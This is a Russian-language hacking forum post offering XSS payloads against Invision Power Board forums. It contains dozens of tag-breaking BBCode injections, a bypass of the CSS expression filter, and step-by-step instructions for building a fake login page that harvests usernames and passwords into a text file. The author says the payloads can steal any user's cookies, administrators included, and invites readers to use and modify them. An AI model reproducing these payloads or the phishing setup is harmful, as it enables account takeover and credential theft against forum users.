Предисловие:Итак многие наверняка читали тему m0nk(а).
Там был способ как сделать перенаправление на другой сайт. Эта штука называться Межсайтинговый скриптинг, то есть пассивная xss. И вообщем-то она была бы до сих пор актуальна, но так как в версиях IPB 3.0 + убрали тег acronym. Она не акутальна. Я решил приготовить новую тему о фейк страницах и межсайтинговом скриптинге.
Во-первых что же такое Xss? (англ. Сross Site Sсriрting — «межсайтовый скриптинг») — тип уязвимости интерактивных информационных систем в вебе. Существует 2 типа Xss Активная и Пассивная. Но об о всем этом вы сможете прочитать на других порталах. Сейчас мы разберем пассивную Xss.
Освещу несколько моментов:
1)Мною будет приведен список подвида xss-уязвимостей, основанных на разрушении структуры тега. Думаю новичкам надо уйти с темы и сначало почитать что такое вообще xss. Так как для вас это будет пустая трата времени.
2) Запрет expression преодолевается путем кодирования одного из символов комментария в dec (expr&*#47;**/ession) вне пределов стилевого атрибута форума. Но обращение с expression требует немалой осторожности. Исходя из моего опыта саму заглушку expression следует прописывать по старинке в отдельном атрибуте ( style=gg:expression(eval(this.blabla)) blabla=confirm(1);this.blabla=null//), и НИКОГДА не пытаться вставлять рабочий код в само выражение - очень нестабильная конструкция.
3)Сокрытие кода возможно через цвет, как описано в источнике, но лучше через стиль и грамотный отказ от вложенных и спаренных тегов в пользу структуры скрещенных bb-тегов. Этот выбор вам предоставится.
Итак приступим все варианты разрушения структур представлены здесь:
Код:
1) [*email=[Ссылки могут видеть только зарегистрированные пользователи. ]]Clickhere![*/email]
A) [*email=[Ссылки могут видеть только зарегистрированные пользователи. ][*email=[Ссылки могут видеть только зарегистрированные пользователи. ]][*/email]][*/email]
B) [*email=[Ссылки могут видеть только зарегистрированные пользователи. ][*font=times]This]Click[*/font] here![*/email]
C) [*email=[Ссылки могут видеть только зарегистрированные пользователи. ][*color=red]This]Click[*/color] here![*/email]
D) [*email=[Ссылки могут видеть только зарегистрированные пользователи. ][*background=red]Red_background_behind_this_text]Clickhere![*/background][*/email]
E) [*email=[Ссылки могут видеть только зарегистрированные пользователи. ][*member=admin]runs this site.]Clickhere![*/email]
F) [*email=[Ссылки могут видеть только зарегистрированные пользователи. ][*blog=100]Clickme!]Click[*/blog]here![*/email]
G) [*email=[Ссылки могут видеть только зарегистрированные пользователи. ][*entry=100]Click_me!]Click[*/entry]here![*/email]
2) [*url]http://www.domain.com[*/url]
A) [*url]http://www.domain.com[*email][Ссылки могут видеть только зарегистрированные пользователи. ][*/email][*/url]
B) [*url]http://www.domain.com[*email=[Ссылки могут видеть только зарегистрированные пользователи. ]]Clickhere![*/email][*/url]
C) [*url]http://www.domain.com[*size=7]This[*/size][*/url]
D) [*url]http://www.domain.com[*font=times]This[*/font][*/url]
E) [*url]http://www.domain.com[*color=red]This[*/color][*/url]
F) [*url]http://www.domain.com[*background=red]Red_background_behind_this_text[*/url][*/background]
G) [*url]http://www.domain.com[*blog=100]Clickme![*/blog][*/url]
H) [*url]http://www.domain.com[*entry=100]Click_me![*/entry][*/url]
3) [*url=http://www.domain.com]Clickhere![*/url]
A) [*url=http://www.domain.com[*email=[Ссылки могут видеть только зарегистрированные пользователи. ]]Clickhere!]Click[*/email]here![*/url]
B) [*url=http://www.domain.com[*font=times]This]Cli[*/font]ckhere![*/url]
C) [*url=http://www.domain.com[*color=red]This]Cli[*/color]ckhere![*/url]
D) [*url=http://www.domain.com[*background=red]Red_background_behind_this_text]Clickhere![*/background][*/url]
E) [*url=http://www.domain.com[*member=admin]runs this site.]Clickhere![*/url]
F) [*url=http://www.domain.com[*blog=100 blabla]Clic]kme![*/blog]Clickhere![*/url]
G) [*url=http://www.domain.com[*entry=100]Click_me!]Click[*/entry]here![*/url]
4) [*font=times]This[*/font]
A) [*font=times[*font=times]This[*/font]]This[*/font]
B) [*font=times[*member=admin]runs this site.]This[*/font]
C) [*font=times[*blog=100]Clickme!]Th[*/blog]is[*/font]
D) [*font=times[*entry=100]Click_me!]Th[*/entry]is[*/font]
5) [*color=red]This[*/color]
A) [*color=red[*color=red]This[*/color]]This[*/color]
B) [*color=red[*font=times]This]Th[*/font]is[*/color]
C) [*color=red[*member=admin]runs this site.]This[*/color]
D) [*color=red[*blog=100]Clickme!]Th[*/blog]is[*/color]
E) [*color=red[*entry=100]Click_me!]Th[*/entry]is[*/color]
6) [*topic=100]Clickme![*/topic]
A) [*topic=100[*topic=100]Clickme![*/topic]]Clickme![*/topic]
B) [*topic=100[*post=100]Clickme!]Click[*/post]me![*/topic]
C) [*topic=100[*color=red]This]Clic[*/color]kme![*/topic]
D) [*topic=100[*font=times]This]Clic[*/font]kme![*/topic]
E) [*topic=100[*url=http://www.domain.com]Clickhere!]Cli[*/url]ckme![*/topic]
F) [*topic=100[*email=[Ссылки могут видеть только зарегистрированные пользователи. ]]Clickhere!]Clickme![*/topic][*/email]
G) [*topic=100[*acronym='Laugh Out Loud']lo]l[*/acronym]]Clickme![*/topic]
H) [*topic=100[*background=red]Red_background_behind_this_text]Clickme![*/background][*/topic]
I) [*topic=100[*member=admin]runs this site.]Clickme![*/topic]
J) [*topic=100[*blog=100]Clickme!]Clic[*/blog]kme![*/topic]
K) [*topic=100[*entry=100]Click_me!]Clickme![*/entry][*/topic]
7) [*post=100]Clickme![*/post]
A) [*post=100[*topic=100]Clickme![*/topic]]Clickme![*/post]
B) [*post=100[*email=[Ссылки могут видеть только зарегистрированные пользователи. ]]][*/post][*/email]
C) [*post=100[*acronym=Laugh]lol]Clickme![*/acronym][*/post]
D) [*post=100[*background=red]Red_background_behind_this_text]Clickme![*/background][*/post]
E) [*post=100[*member=admin]runs this site.]Clickme![*/post]
F) [*post=100[*blog=100]Clickme!]Clickme![*/post][*/blog]
G) [*post=100[*entry=100]Click_me!]Click[*/entry]me![*/post]
8) [*acronym='Laugh Out Loud']lol[*/acronym]
A) [*acronym='Laugh Out Loud[*email=[Ссылки могут видеть только зарегистрированные пользователи. ]]Clickhere!']lol[*/email][*/acronym]
B) [*acronym='Laugh Out Loud[*url=http://www.domain.com]Clickhere!']lol[*/url][*/acronym]
C) [*acronym='Laugh Out Loud[*font=times]This']lol[*/font][*/acronym]
D) [*acronym='Laugh Out Loud[*color=red]This']lol[*/color][*/acronym]
E) [*acronym='Laugh Out Loud[*background=red]Red background behind this ]text[*/background]']lol[*/acronym]
F) [*acronym='Laugh Out Loud[*member=admin]runs this site.']lol[*/acronym]
G) [*acronym='Laugh Out Loud[*acronym='Laugh Out Loud']lol[*/acronym]']lol[*/acronym] --> реинкарнация xss в IPB 2.3.5 от brain[pillow]
H) [*acronym=Laugh[*blog=100]Clickme!]lol[*/blog][*/acronym]
9) [*background=red]Red_background_behind_this_text[*/background]
A) [*background=red[*font=times]Thi]sRed_background_behind_this_text[*/font][*/background]
B) [*background=red[*color=red]This]Red_background_behind_this_text[*/color][*/background]
C) [*background=red[*background=red]Red_background_behind_this_text[*/background]]Red_background_behind_this_text[*/background]
D) [*background=red[*member=admin]runs this site.]Red_background_behind_this_text[*/background]
E) [*background=red[*blog=100]Clickme!]Red [*/blog]background behind this text[*/background]
F) [*background=red[*entry=100]]Red[*/entry][*/background]
Это и есть коды всех разрушений структур тегов
С Подгруппами 2 и 3 можно сделать фэйк страницу, объясняю
1)Для начала нам нужно скачать ArxWFakeGen (Зеркало:[Ссылки могут видеть только зарегистрированные пользователи. ] спасибо rea1) (Антивирус скажет что там вирус, но не пугайтесь это hactool)
Распаковываем, запускаем:
1)В поле страница пишем путь к странице авторизации форума. Пример: [Ссылки могут видеть только зарегистрированные пользователи. ]
2) В поле переадресация делаем на главную. Пример: [Ссылки могут видеть только зарегистрированные пользователи. ]
3)Где тип базы выберите "Своя" и вместо base3124.dat пишим pass.txt (ну или другое название типа password.txt key.txt lol.txt и т.д.)
4)В поле тип главной выберите htm
5) Нажимаем создать, выбираем 2 поля UserName и PassWord, нажимаем продолжить, закрываем, видим 3 файла в корне программы ( login.php, index.htm, pass.txt) все их нужно залить на фтп. (Для этого вам нужен хостинг. список хостингов можно посмотреть здесь
Очень часто прога создает ошибки в фейке и у вас не отображаются картинки, для этого открываем index.htm текстовым файлом ищем строчки:
E) [*url=http://www.domain.com[*member=admin]runs this site.]Clickhere![*/url]
[Ссылки могут видеть только зарегистрированные пользователи. ] Вместо этого вставялем код своей фэйк страницы
И когда человек кликает на эту подпись( можно вставить фэйк сылку) либо просто выделяет его пересылает на фэйк форум с требованием авторизации
Я рассказал минимум, так как освещать все моменты разрушения структур не буду. Тк это быстро могут пофиксить, тк новички и скрипт-кидди будут этим пользоваться. И еще не надо ныть распиши распиши, xss сложный подвид атак, и все расписывать просто возможности нету, если хотите научиться нормально пользоваться xss уязвимости прошу прочитать мат.часть, и все коды которые здесь указаны, вы сможете использовать в собственных целях, даже модифицируя их
Эти xss были найдены LeverOne.
Однако материал и статья подготавливались мною.
Не несу никакой ответственности за использование багов IPB, материал представлен лишь для ознакомления.
Буду добавлять xss атаки:
Активная Xss
1) IPB 3.0.1
For IE
Ладно по просьбе некоторых пользователей "разжую" все:
Итак приступим здесь описаны XSS
Существует 2 вида xss пассивная(требует от пользователя каких либо действий) и активная(пользователь всего лишь должен быть авторизован\перейти по ссылке, то есть никаких действий делать ему ненадо)
Что бы использовать xss надо ее вставить в сообщение либо в подпись.
Что бы XSS сработала надо убрать спец.символы( в нашем случае *) что бы эти xss не сработали на этом форуме
С помощью этих XSS можно красть куки файлы любого пользователя включая администрацию
Ps как сделать фейк, своб статья было лень писать скопировал от m0nk
Последний раз редактировалось Elnamir; 16.08.2010 в 00:50.
С помощью данной темы можно осуществлять взлом серверов, так что да, статья имеет больше отношение к Базам данных, но однако же статья monk'a же в этом разделе!